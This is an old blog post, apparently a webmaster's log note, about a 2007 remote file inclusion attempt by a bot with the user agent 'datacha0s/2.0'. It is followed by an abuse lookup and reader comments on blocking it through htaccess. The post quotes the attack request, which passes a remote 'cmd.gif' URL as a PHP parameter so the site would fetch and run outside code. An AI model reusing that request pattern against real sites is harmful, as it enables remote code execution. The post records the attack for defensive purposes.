Feb 25, 2007

datacha0s/2.0 hacker bot

Blacklist Domain Ban: serverkompetenz.net Suspected spambot

myscript-.php?id=http://216.70.54.238/images/cmd.gif? GET HTTP/1.0
Agent: datacha0s/2.0
85.214.41.147 h854010.serverkompetenz.net

Just saw the above atempted remote script access. The bot atempted to get my script to load its script at http://216.70.54.238/images/cmd.gif and get me to run it.

The website at that ip has the website kitchensolvers.com on it ans has likely been hacked.



Parsing input: http://216.70.54.238/images/cmd.gif
host 216.70.54.238 (getting name) = www.modernimage.ws.
Display data:
"whois 216.70.54.238@whois.arin.net" (Getting contact from whois.arin.net )
Found AbuseEmail in whois abuse@enventis.com
216.70.0.0 - 216.70.63.255:abuse@enventis.com
host 216.70.54.238 = www.modernimage.ws (cached)
Host www.modernimage.ws (checking ip) = 64.70.19.33

No reporting addresses found for 216.70.54.238, using devnull for tracking.
Statistics:
216.70.54.238 not listed in bl.spamcop.net
More Information..
216.70.54.238 not listed in dnsbl.njabl.org
216.70.54.238 not listed in dnsbl.njabl.org
216.70.54.238 not listed in cbl.abuseat.org
216.70.54.238 not listed in dnsbl.sorbs.net

No valid email addresses found, sorry!

5 comments:

Anonymous said...

Thank you :)

So, i need to block these in my htaccess-file:

216.70.54.238
85.214.41.147
.serverkompetenz.net
216.70.54.238
.modernimage.ws

?

Anonymous said...

serverkompetenz.net is a domain that is used by Strato (a German domain registrar and ISP) for their hosted servers.

All hosted servers at Strato have the name hXXXXX.serverkompetenz.net.

Blocking .serverkompetenz.net will have the side-effect of also blocking innocent servers.

tmaster said...

Well here is the problem. Its not a ISP so no real users are on it. Sinxce its only servers and abuse has been detected than no real problem in banning it.

Anonymous said...

Hi.
My Blogger site has been visited by these same guys, today. TWICE, only the index.
I do not know what they tried to do. Should I bother to prevent them to visit again? How do I do this?

Anonymous said...

SetEnvIfNoCase User-Agent "DataCha0s/2.0" keep_out


order allow,deny
allow from all
deny from env=keep_out